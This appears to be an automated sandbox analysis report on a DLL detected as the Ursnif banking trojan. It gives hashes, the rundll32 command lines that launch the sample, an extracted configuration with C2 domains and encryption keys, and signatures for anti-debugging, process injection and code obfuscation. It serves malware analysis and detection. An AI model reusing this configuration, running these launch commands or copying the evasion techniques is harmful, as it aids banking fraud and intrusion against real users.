Play interactive tour

Edit tour

Analysis Report 8OKQ6ogGRx.dll

Overview

General Information

Sample Name:	8OKQ6ogGRx.dll
Analysis ID:	404147
MD5:	e8eae1a820426a722c7cae54ed5bacd8
SHA1:	4d8368f112e0c56e7caccb89724bfdad1999e706
SHA256:	eb498648d17ad5250ab1f38b190dd2da8bfa8db3ee86054db991db79d15ad5cc
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

PE file contains an invalid checksum

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 2168 cmdline: loaddll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 3880 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6024 cmdline: rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3468 cmdline: rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3512 cmdline: rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Multiply MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5212 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5240 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5212 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KfAh1HjBYV5+GLf1H4+++WQcflLYE80sojTEX/uvXaLXhDxSfFOCIe7aHw1TYNxXIBvEkznlAveWMvLVTSjkgy/Hqpm47GUbXiPUxbpl0qoDhGQpz45mxRQlc+jgXQ4D03Y0gMF90NeOpBOEi497zfDlURi8Me7OHCSUNpn4Q0kQtrInhQlll9V6IFuYjZJB", "c2_domain": ["outlook.com/login", "gmail.com", "dorelunonu.us", "morelunonu.us"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 2168	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.3.rundll32.exe.30aa438.0.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "KfAh1HjBYV5+GLf1H4+++WQcflLYE80sojTEX/uvXaLXhDxSfFOCIe7aHw1TYNxXIBvEkznlAveWMvLVTSjkgy/Hqpm47GUbXiPUxbpl0qoDhGQpz45mxRQlc+jgXQ4D03Y0gMF90NeOpBOEi497zfDlURi8Me7OHCSUNpn4Q0kQtrInhQlll9V6IFuYjZJB", "c2_domain": ["outlook.com/login", "gmail.com", "dorelunonu.us", "morelunonu.us"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Source: 8OKQ6ogGRx.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 8OKQ6ogGRx.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\364\Head\Fresh-Room\score_Several\turn.pdb source: loaddll32.exe, 00000000.00000002.474262084.000000006E12B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.473027283.000000006E12B000.00000002.00020000.sdmp, 8OKQ6ogGRx.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00BB896F RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

0_2_00BB896F

Source: unknown

DNS traffic detected: queries for: outlook.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E0C101B NtMapViewOfSection,	0_2_6E0C101B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E0C145E NtCreateSection,memset,	0_2_6E0C145E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E0C23A5 NtQueryVirtualMemory,	0_2_6E0C23A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB1724 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_00BB1724
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBB301 NtQueryVirtualMemory,	0_2_00BBB301

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E0C2184	0_2_6E0C2184
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB62D8	0_2_00BB62D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBB0DC	0_2_00BBB0DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB8045	0_2_00BB8045
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E10AF51	0_2_6E10AF51
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E106700	0_2_6E106700
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E129DAE	0_2_6E129DAE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E123A47	0_2_6E123A47
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E127AB1	0_2_6E127AB1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E114B3B	0_2_6E114B3B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E12035D	0_2_6E12035D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1228C3	0_2_6E1228C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E10C100	0_2_6E10C100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E10AF51	3_2_6E10AF51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E106700	3_2_6E106700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E129DAE	3_2_6E129DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E123A47	3_2_6E123A47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E127AB1	3_2_6E127AB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E114B3B	3_2_6E114B3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E12035D	3_2_6E12035D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1228C3	3_2_6E1228C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E10C100	3_2_6E10C100

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E10B2D0 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E10B2D0 appears 32 times

Source: 8OKQ6ogGRx.dll

Binary or memory string: OriginalFilenameturn.dll8 vs 8OKQ6ogGRx.dll

Source: 8OKQ6ogGRx.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 8OKQ6ogGRx.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal64.troj.winDLL@12/4@3/0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00BB24C7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00BB24C7

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFFDCA7E35786F02EC.TMP

Jump to behavior

Source: 8OKQ6ogGRx.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Multiply
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5212 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Multiply	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5212 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 8OKQ6ogGRx.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8OKQ6ogGRx.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8OKQ6ogGRx.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8OKQ6ogGRx.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8OKQ6ogGRx.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8OKQ6ogGRx.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 8OKQ6ogGRx.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 8OKQ6ogGRx.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: 8OKQ6ogGRx.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8OKQ6ogGRx.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8OKQ6ogGRx.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8OKQ6ogGRx.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8OKQ6ogGRx.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E0C160D LoadLibraryA,GetProcAddress,

0_2_6E0C160D

Source: 8OKQ6ogGRx.dll

Static PE information: real checksum: 0x8203c should be: 0x8017c

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E0C2120 push ecx; ret	0_2_6E0C2129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E0C2173 push ecx; ret	0_2_6E0C2183
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBB0CB push ecx; ret	0_2_00BBB0DB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBAD10 push ecx; ret	0_2_00BBAD19
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E10B315 push ecx; ret	0_2_6E10B328
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E14221D push eax; retf	0_2_6E142220
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E142BB6 push ecx; ret	0_2_6E142BD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E0D420E push es; ret	3_2_6E0D420F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E0D423B push ebx; ret	3_2_6E0D424E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E10B315 push ecx; ret	3_2_6E10B328
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E0D43C5 push ebp; ret	3_2_6E0D43CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E0D5842 push esp; ret	3_2_6E0D588C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E14221D push eax; retf	3_2_6E142220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E142BB6 push ecx; ret	3_2_6E142BD1

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

0_2_00BB896F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E10C6CB _memset,IsDebuggerPresent,

0_2_6E10C6CB

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E112CFE ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

0_2_6E112CFE

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E0C160D LoadLibraryA,GetProcAddress,

0_2_6E0C160D

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E141302 mov eax, dword ptr fs:[00000030h]	0_2_6E141302
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E140E3F push dword ptr fs:[00000030h]	0_2_6E140E3F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E141238 mov eax, dword ptr fs:[00000030h]	0_2_6E141238
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E141302 mov eax, dword ptr fs:[00000030h]	3_2_6E141302
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E140E3F push dword ptr fs:[00000030h]	3_2_6E140E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E141238 mov eax, dword ptr fs:[00000030h]	3_2_6E141238

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E10B830 GetProcessHeap,

0_2_6E10B830

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E111090 SetUnhandledExceptionFilter,	0_2_6E111090
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1110C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1110C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E111090 SetUnhandledExceptionFilter,	3_2_6E111090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1110C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E1110C1

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.470347990.0000000001620000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472110783.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.470347990.0000000001620000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472110783.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.470347990.0000000001620000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472110783.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.470347990.0000000001620000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.472110783.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00BB7EC1 cpuid

0_2_00BB7EC1

Source: C:\Windows\System32\loaddll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6E12770D
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	0_2_6E1277BA
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	0_2_6E1275E3
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E111A40
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E127292
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E111AC6
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6E1272EE
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6E12736B
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	0_2_6E1273EE
Source: C:\Windows\System32\loaddll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	0_2_6E12701E
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_6E11185F
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_6E10A8B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6E12770D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	3_2_6E1277BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6E1275E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6E111A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6E127292
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6E111AC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6E1272EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6E12736B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6E1273EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	3_2_6E12701E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_6E11185F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	3_2_6E10A8B9

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E0C195D GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6E0C195D

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00BB7EC1 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_00BB7EC1

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E10CFA3 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_6E10CFA3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E0C1800 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6E0C1800

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2168, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery23	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

